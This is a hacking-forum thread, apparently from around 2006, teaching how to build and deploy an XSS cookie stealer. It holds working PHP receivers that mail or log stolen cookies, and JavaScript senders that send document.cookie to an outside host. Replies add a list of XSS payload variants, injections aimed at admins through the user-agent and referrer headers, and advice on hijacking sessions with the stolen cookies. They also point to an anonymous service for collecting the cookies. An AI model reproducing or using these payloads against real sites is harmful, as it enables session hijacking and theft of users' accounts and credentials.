[Freakwolfe]

I've explained this process several times to several different people, so I thought I'd just make one thread for it. If you have any questions or additional information, post it here.

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

<?php																 // line 1
$cookie = $HTTP_GET_VARS["cookie"];								   // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie);			// line 3
?>																	// line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

<?php																 // line 1
$cookie = $HTTP_GET_VARS["cookie"];								   // line 2
$file = fopen('cookielog.txt', 'a');								  // line 3
fwrite($file, $cookie . "\n\n");									  // line 4
?>																	// line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and Javascript, so you have to be sure that your environment supports those two. Here is an example of a sender.

<script language="Javascript">														 // Line 1
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;                                // Line 2
</script>																		       // Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as Javascript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as Javascript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

You can trick the victim into clicking a link which activates the sender. For example:

<a href="java script:document.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a>

(remove the space in "javascript")

Another method I discovered is putting...

<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>

...into my user-agent.



Free PHP hosts:
http://www.0php.com/..._webhosting.php
http://www.free-webh...-webhosting.php


Do not ask what a cookie stealer is or how to use one; such questions have already been answered in this thread. Please read the entire thread before asking a question. If you have thoroughly read the thread and are still having difficulty, post your questions intelligently. Otherwise, I will close the thread again.

[Lockdown]

Perhaps you should include an explanation of what can be done once you have the victims cookies... Realistic 9 (Crappy soft right) really didn't go into enough detail about that.

It's a good tutorial, but it's assuming the reader knows what the hell to do with cookies once he/she has them

[Freakwolfe]

If they don't know what to do with cookies, then why would they be interested in making a cookie stealer?

I might add a bit about cookie injection later. Until then, if someone else wants to post about it, go ahead.

[charlie(cph)]

if you log user agents escape " so it appears as /"

[Arkan]

Attach it in a Flash Sig or Image...something like that?

[digi7al64]

Nice article Freakwolfe.

Over time i will add other code snippets into the post on all the different types of scripts/syntax you can use for cookie stealing.

General HTML allowed posting

<script>document.location="http://www.site.com/?" + document.cookie;</script>
---
<a href="http://www.xss.com" onmouseover="java script:document.images[1].src='http://www.site.com?'+document.cookie;">xss</a>
---
<img src="java script:document.images[1].src='http://www.site.com?'+document.cookie;">
---
<style>body {background:url(java script:document.images[1].src="http://www.site.com?"+document.cookie)}</style>
---
<meta http-equiv="refresh" content="666;url=java script:alert('xss');">
---
<frame src=http://www.site.com/?<script>win.open(“http://www.site.com/?”+document.cookie</script>> 
---
<xml src="java script:document.location='http://www.site.com?'+document.cookie">
---
<div onmouseover="java script:document.location='http://www.site.com?'+document.cookie">
---
<link rel="stylesheet" href="java script:document.location='http://www.site.com?'+document.cookie">
---
<style type="text/javascript">document.location='http://www.site.com?'+document.cookie</style>

Targeting Admins

useragent = <script>alert('xss')</script>
---
referrer = <script>alert('xss')</script>
---
cookie sessionid=<script>alert('xss')</script>
---
http://www.xss.com?post=<script>alert(xss')</script>

Also regarding querystrings etc ie "cookie.php?cookie=value" just use "cookie.php?value" instead and the '$QUERY_STRING' value to retrieve it.

Finally when logging user data get all the info you can, ip, agents and os. remember it doesn't matter how secure the forum is if you can compromise the users system.

[Freakwolfe]

Thanks for the additional info, digi7al64. Those are some handy tips.

Typically, cheap forums log user/password information. Most of the time, the passwords are hashed. If you are lucky enough to get the user ID and password (hashed or not) the next step is rather obvious.

If you get some kind of weird pseudo-session data, you can try injecting that into your own cookie to log on as that user.

[spindoctor]

Ok :) finally managed to get the cookie stealer up and running, I am now recieving emails, as i tested the stealer out on my forum. I recieve all the session ID's and hashed password in the email. Say if i wanted to use this to my advantage. How would i go about using this information? Now im this far.

[Freakwolfe]

To change your current cookie, paste this into the URL bar (remove the space between "java" and "script":

java script:void(document.cookie=prompt("Your cookie is currently:\n"+document.cookie,document.cookie));

Beyond that, you're on your own.

[spindoctor]

Thanks, I've also been working with the cookie editor that comes as an add on with firefox. That seems to be working easily for me.


Oh and i think you should add something to the cookie script that you posted that writes to a log file

Quote

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>

to..

<?php															 
$cookie = $HTTP_GET_VARS["cookie"];								   
$file = fopen('cookielog.txt', 'a');								 
fwrite($file, $cookie . "\n\n");   
fclose($file);								   
?>

It probably makes no difference.. but shouldent you close the $file ?

This post has been edited by spindoctor: 21 April 2006 - 09:05 PM

[digi7al64]

ok this is real simple

1. Copy and paste this script into textpad/notepad
2. Save as cookie.php.
3. Upload to your server.
4. Create a empty txt file called log.txt
5. Upload to your server in the same directory as cookie.php ensuring it has write permissions.
6. inject you cookie stealer script into whatever. an example would be

<script>document.location='http://www.yoururl.com/cookie.php?'+document.cookie;</script>

7. wait for the cookie data to come rolling in.

NOTICE: I have not used any querystring key/value to get the cookie, i simply make the cookie data the querystring

This post has been edited by digi7al64: 21 March 2007 - 07:36 AM

[Freakwolfe]

There isn't going to be a cookie if you don't have one to begin with. Set your cookie in the HTML file before the stealer is activated.

[digi7al64]

Use this to get the cookie data instead.

$cookie = $_SERVER['QUERY_STRING'];

In your request you are only asking for "c" value whereas this will take the entire querystring.

As for why yours doesn't work ? and & = querystring # = a named anchor on the page so it will by default stop the value there anyway.

[Sid]

I've cleared this thread of some pointless posts. I want to add something though. One problem with stealing cookies is that you have to give away your domain name (to send the cookies to that place). Well, not any more. Have a look at http://ccl.whiteacid.org/ and you'll see you can create an account there and have them sent there which keeps you anonymous.